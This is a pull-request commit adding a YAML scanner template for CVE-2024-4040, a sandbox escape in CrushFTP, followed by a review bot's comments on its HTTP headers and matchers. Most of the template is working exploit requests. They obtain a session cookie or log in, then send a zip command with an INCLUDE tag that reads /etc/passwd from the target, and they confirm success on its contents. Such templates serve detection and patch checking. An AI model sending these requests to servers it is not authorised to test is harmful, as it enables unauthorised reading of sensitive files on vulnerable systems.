Merge pull request #9631 from projectdiscovery/CVE-2024-4040
Create CVE-2024-4040.yaml (CrushFTP VFS Sandbox Escape 🔥 )
patch-2
commit
6929138198
@ -0,0 +1,124 @@
id: CVE-2024-4040
info:
name: CrushFTP VFS - Sandbox Escape LFR
author: DhiyaneshDK,pussycat0x
severity: critical
description: |
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
reference:
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-4040
cwe-id: CWE-94,CWE-1336
epss-score: 0.016
epss-percentile: 0.87316
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: crushftp
product: crushftp
shodan-query: html:"CrushFTP"
tags: cve,cve2024,lfr,crushftp,vfs,kev
flow: |
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
// if username or password is not provided, run unauthenticated exploit
http("unauth-exploit")
} else {
// if username and password is provided, run login script and authenticated exploit
http("login") && http("auth-exploit")
}
http:
# unauthenticated exploit
- id: unauth-exploit
raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "root:x:"
- type: word
part: header
words:
- "text/xml"
extractors:
- type: regex
name: auth
internal: true
part: header_1
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
# login script
- id: login
raw:
- |
GET /WebInterface/ HTTP/1.1
Host: {{Hostname}}
- |
POST /WebInterface/function/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 111
Origin: {{RootURL}}
Referer: http://{{RootURL}}/WebInterface/login.html
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body_2
internal: true
words:
- "<response>success</response>"
- type: word
part: header_2
internal: true
words:
- "text/xml"
extractors:
- type: regex
name: auth
internal: true
part: header_2
group: 1
regex:
- 'currentAuth=([0-9a-zA-Z]+)'
# authenticated exploit
- id: auth-exploit
raw:
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "root:x:"
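Review bot: `Referer: http://{{RootURL}}/WebInterface/login.html` in the second raw request of the `login` block double-prefixes the scheme, because `{{RootURL}}` already expands to scheme://host:port; the header should read `Referer: {{RootURL}}/WebInterface/login.html`. The same request pins `Content-Length: 111`, which cannot match a body whose length varies with the substituted `{{username}}` and `{{password}}`; unless the engine recomputes the length, the login body will be truncated or over-read, so the header is better dropped and left to the engine. The `auth-exploit` block confirms only on `root:x:` in the body while `unauth-exploit` additionally requires a `text/xml` content type, so the two paths differ in how strictly they validate the response; adding the same header matcher to `auth-exploit` would keep them at parity and reduce false positives. The `description` says attackers need low privileges while `cvss-metrics` records `PR:N`, which is what the unauthenticated flow relies on; a one-line comment noting which is intended would help the next maintainer.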